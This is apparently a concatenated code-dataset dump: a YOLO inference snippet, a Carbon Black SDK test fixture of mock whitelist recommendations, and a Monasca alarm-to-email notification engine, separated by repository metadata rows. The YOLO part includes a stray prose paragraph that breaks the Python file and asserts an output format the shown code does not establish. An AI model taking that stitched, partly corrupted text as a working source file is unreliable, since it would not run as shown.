        all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',', ' ')

    for i in range(len(all_bounding_boxnind)):
        # check if file exists else make new
        with open(out + '{}.txt'.format(name), "a+") as file_object:
            # Move read cursor to the start of file.
            file_object.seek(0)
            # If file is not empty then append '\n'
            data = file_object.read(100)
            if len(data) > 0:
                file_object.write("\n")
            # Append text at the end of file
            file_object.write(all_bounding_boxnind[i])

#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300

img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
            glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)

pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy()  # <xmin><ymin><xmax><ymax><confd><class_id>

coords_minmax = np.zeros((boxes.shape[0], 4))  # dropping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:, 0:4]  # coords
confd = boxes[:, 4]  # confidence
class_ids = boxes[:, 5]  # class id

coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
    coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
    det_classes.append(class_names[int(class_ids[i])])

t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path), img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
    print(det_classes[k], t[k], confd[k])
print('='*50)
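Once the comma and space munging above is done, each output file holds one detection per line as class_name confidence xmin ymin xmax ymax. A small sketch for reading such a file back; the path in the usage note is illustrative only.

def read_detections(txt_path):
    """Parse one 'class conf x1 y1 x2 y2' detection per line."""
    dets = []
    with open(txt_path) as f:
        for line in f:
            cls, conf, x1, y1, x2, y2 = line.split()
            dets.append((cls, float(conf), float(x1), float(y1), float(x2), float(y2)))
    return dets

# e.g. read_detections('/home/user01/data_ssd/Talha/yolo/op/<image name>.txt')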
36.833333
135
0.680927
0
0
0
0
0
0
0
0
1,786
0.244892
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0
5,712
py
Python
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
24
2020-10-16T22:07:38.000Z
2022-03-24T14:58:03.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
63
2020-10-26T18:26:15.000Z
2022-03-31T17:31:02.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
10
2020-11-09T11:54:23.000Z
2022-03-24T20:44:00.000Z
"""Mock responses for recommendations.""" SEARCH_REQ = { "criteria": { "policy_type": ['reputation_override'], "status": ['NEW', 'REJECTED', 'ACCEPTED'], "hashes": ['111', '222'] }, "rows": 50, "sort": [ { "field": "impact_score", "order": "DESC" } ] } SEARCH_RESP = { "results": [ { "recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede", "filename": "XprotectService", "application": { "type": "EXE", "value": "FOO" } }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:39.000Z", "comment": "Ours is the fury" }, "impact": { "org_adoption": "LOW", "impacted_devices": 45, "event_count": 76, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0", "filename": "sophos ui.msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:09.000Z", "comment": "Always pay your debts" }, "impact": { "org_adoption": "HIGH", "impacted_devices": 8, "event_count": 25, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ], "num_found": 3 } ACTION_INIT = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ACTION_REQS = [ { "action": "ACCEPT", "comment": "Alpha" }, { "action": "RESET" }, { "action": "REJECT", "comment": "Charlie" }, ] ACTION_REFRESH_SEARCH = { "criteria": { "status": ['NEW', 'REJECTED', 'ACCEPTED'], "policy_type": ['reputation_override'] }, "rows": 50 } ACTION_SEARCH_RESP = { "results": [ACTION_INIT], "num_found": 1 } ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED'] ACTION_INIT_ACCEPTED = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", 
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "ACCEPTED", "ref_id": "e9410b754ea011ebbfd0db2585a41b07", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }
31.043478
98
0.500525
0
0
0
0
0
0
0
0
3,275
0.573354
d5b36222e5f117b24edaf10265aa3e6b8fc6c46c
7,351
py
Python
monasca/microservice/notification_engine.py
TeamZenith/python-monasca
badc86fbe2c4424deb15b84eabd3248e899ef4ee
[ "Apache-2.0" ]
null
null
null
monasca/microservice/notification_engine.py
TeamZenith/python-monasca
badc86fbe2c4424deb15b84eabd3248e899ef4ee
[ "Apache-2.0" ]
null
null
null
monasca/microservice/notification_engine.py
TeamZenith/python-monasca
badc86fbe2c4424deb15b84eabd3248e899ef4ee
[ "Apache-2.0" ]
null
null
null
# Copyright 2015 Carnegie Mellon University
#
# Author: Han Chen <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import ast
import json

from oslo.config import cfg
from stevedore import driver

from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service

es_opts = [
    cfg.StrOpt('topic',
               default='alarm',
               help=('The topic that messages will be retrieved from. '
                     'This also will be used as a doc type when saved '
                     'to ElasticSearch.')),
    cfg.StrOpt('topic2',
               default='notification_methods',
               help=('The topic that messages will be retrieved from. '
                     'This also will be used as a doc type when saved '
                     'to ElasticSearch.')),
    cfg.StrOpt('doc_type',
               default='',
               help=('The document type which defines what document '
                     'type the messages will be saved into. If not '
                     'specified, then the topic will be used.')),
    cfg.StrOpt('processor',
               default='',
               help=('The message processor to load to process the message. '
                     'If the message does not need to be processed anyway, '
                     'leave the default.')),
]

es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)

LOG = log.getLogger(__name__)


class NotificationEngine(os_service.Service):
    def __init__(self, threads=1000):
        super(NotificationEngine, self).__init__(threads)
        self._kafka_conn = kafka_conn.KafkaConnection(
            cfg.CONF.notification.topic)

        # Use doc_type if it is defined.
        if cfg.CONF.notification.doc_type:
            self._es_conn = es_conn.ESConnection(
                cfg.CONF.notification.doc_type)
        else:
            self._es_conn = es_conn.ESConnection(
                cfg.CONF.notification.topic2)

    def handle_alarm_msg(self, msg):
        if msg and msg.message:
            LOG.debug("Message received for alarm: " + msg.message.value)
            value = msg.message.value
            if value:
                # value's format is:
                # {
                #     "metrics": {
                #         "timestamp": 1432672915.409,
                #         "name": "biz",
                #         "value": 1500,
                #         "dimensions": {
                #             "key2": "value2",
                #             "key1": "value1"
                #         }
                #     },
                #     "state_updated_timestamp": 1432672915,
                #     "state": "ALARM",
                #     "alarm-definition": {
                #         "alarm_actions": [
                #             "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
                #         ],
                #         "undetermined_actions": [
                #             "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
                #         ],
                #         "name": "Average CPU percent greater than 10",
                #         "match_by": [
                #             "hostname"
                #         ],
                #         "description": "The average CPU percent is greater than 10",
                #         "ok_actions": [
                #             "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
                #         ],
                #         "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
                #             and max(bar { asd = asd} )>1200 or avg(biz)>1300",
                #         "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
                #         "severity": "LOW"
                #     }
                # }
                # convert to dict, and get state to determine the actions
                # (notification method ids) needed.
                # the method id can be used to match the notification method
                # in elasticSearch.
                # Then an email will be sent (TODO: phone txt msg are not
                # dealt with for now)
                dict_msg = ast.literal_eval(value)
                state = dict_msg["state"]
                if state not in ["ALARM", "OK", "UNDETERMINED"]:
                    LOG.error("state of alarm is not defined as expected")
                    return

                actions = []
                if state == 'ALARM':
                    actions = dict_msg["alarm-definition"]["alarm_actions"]
                if state == 'OK':
                    actions = dict_msg["alarm-definition"]["ok_actions"]
                if state == 'UNDETERMINED':
                    actions = dict_msg["alarm-definition"]["undetermined_actions"]

                addresses = []
                types = []
                # the action_id is an id of a notification method;
                # there can be multiple ids in one alarm message with different types
                for action_id in actions:
                    es_res = self._es_conn.get_message_by_id(action_id)

                    def _get_notification_method_response(res):
                        if res and res.status_code == 200:
                            obj = res.json()
                            if obj:
                                return obj.get('hits')
                            return None
                        else:
                            return None

                    es_res = _get_notification_method_response(es_res)
                    LOG.debug('Query to ElasticSearch returned: %s' % es_res)

                    if es_res is None:
                        LOG.error("The provided notification method is not defined as expected")
                        return

                    name = es_res["hits"][0]["_source"]["name"]
                    type = es_res["hits"][0]["_source"]["type"]
                    address = es_res["hits"][0]["_source"]["address"]

                    types.append(type)
                    addresses.append(address)

                email_addresses = []
                for i in range(len(types)):
                    if types[i] == "EMAIL":
                        email_addresses.append(addresses[i])

                email_sender.send_emails(
                    email_addresses, "Alarm to User",
                    dict_msg["alarm-definition"]["description"])

    def start(self):
        while True:
            try:
                for msg in self._kafka_conn.get_messages():
                    self.handle_alarm_msg(msg)

                # if autocommit is set, this will be a no-op call.
                self._kafka_conn.commit()
            except Exception:
                LOG.exception('Error occurred while handling kafka messages.')

    def stop(self):
        self._kafka_conn.close()
        super(NotificationEngine, self).stop()
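A minimal sketch of the alarm payload documented in the comment block above and the state-to-actions dispatch it drives; all values are illustrative and abridged from that comment.

alarm = {
    "metrics": {"timestamp": 1432672915.409, "name": "biz", "value": 1500,
                "dimensions": {"key1": "value1", "key2": "value2"}},
    "state_updated_timestamp": 1432672915,
    "state": "ALARM",
    "alarm-definition": {
        "alarm_actions": ["c60ec47e-5038-4bf1-9f95-4046c6e9a759"],
        "ok_actions": ["c60ec47e-5038-4bf1-9f95-4046c6e9a759"],
        "undetermined_actions": ["c60ec47e-5038-4bf1-9f95-4046c6e9a759"],
        "name": "Average CPU percent greater than 10",
        "description": "The average CPU percent is greater than 10",
        "severity": "LOW",
    },
}

# Same selection logic as handle_alarm_msg: the state picks the action list,
# and each entry is a notification-method id to resolve in Elasticsearch.
actions = {
    "ALARM": alarm["alarm-definition"]["alarm_actions"],
    "OK": alarm["alarm-definition"]["ok_actions"],
    "UNDETERMINED": alarm["alarm-definition"]["undetermined_actions"],
}[alarm["state"]]
print(actions)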
39.951087
119
0.522786
5,217
0.709699
0
0
0
0
0
0
3,040
0.413549